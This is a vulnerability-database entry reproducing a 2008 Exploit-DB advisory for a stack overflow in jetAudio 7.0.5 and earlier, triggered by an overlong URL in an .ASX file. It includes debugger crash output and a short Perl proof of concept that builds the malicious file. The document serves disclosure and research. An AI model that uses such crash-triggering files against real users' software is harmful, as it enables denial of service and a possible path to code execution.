Application: jetAudio - exploit.company

vendor:

jetAudio

by:

Laurent Gaffié

7.5

CVSS

HIGH

Remote Stack Overflow

119

CWE

Product Name: jetAudio

Affected Version From: jetAudio <= 7.0.5

Affected Version To: jetAudio <= 7.0.5

Patch Exists: NO

Related CWE: N/A

CPE: a:cowon:jetaudio

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2008

Application: jetAudio <= 7.0.5 (.ASX) Remote Stack Overflow

When parsing an asx file with a long URL a stack overflow occurs. An url with 1096 A ( http://AAAAA....) will overwritte ESI and crash the program.

Mitigation:

Ensure that the application is not vulnerable to buffer overflow attacks.

Source

Exploit-DB raw data:

Application: jetAudio <= 7.0.5 (.ASX) Remote Stack Overflow
Web Site: http://www.cowonamerica.com/download/
Platform: Windows
Bug:Remote Stack Overflow
Extension: ASX
special condition: none

-------------------------------------------------------

1) Introduction

2) Bug

3) Proof of concept

4) Credits

===========
1) Introduction
===========

A nice introduction to jetaudio  can be found : http://www.cowonamerica.com/products/jetaudio/

======
2) Bug
======

When parsing an asx file with a long URL a stack overflow occurs.


=====
3)Proof of concept
=====

Proof of concept example :

An url with 1096 A ( http://AAAAA....) will overwritte ESI and crash the program

Here's the debugger output:
Access violation - code c0000005

eax=00000000 ebx=01187684 ecx=00000459 edx=0012d39c esi=41414141 edi=00000001

eip=00441dad esp=0012cf3c ebp=00000001 iopl=0         nv up ei pl nz na po nc

cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206

JetAudio!CxImage::`copy constructor closure'+0x1109d:

00441dad 8b06             mov     eax,[esi]         ds:0023:41414141=????????

Here's the the Poc :


#!/usr/local/bin/perl                                         
                                                              
use strict;                                                   
                                                              
use warnings;                                                 
                                                              
my $file="myfile.asx";                            
                                                              
my $payload = "A" x 1096;                                     
                                                              
open( $FILE, ">>$file") or die "Cannot open $file: $!";       
                                                              
print $FILE "http://".$payload;                               
                                                              
close($FILE);                                                 
                                                              
print "$file has been created \n";                            
                                                              




=====
5)Credits
=====

laurent gaffiÃ©
laurent.gaffie{remove_this}[at]gmail[dot]com

# milw0rm.com [2008-02-08]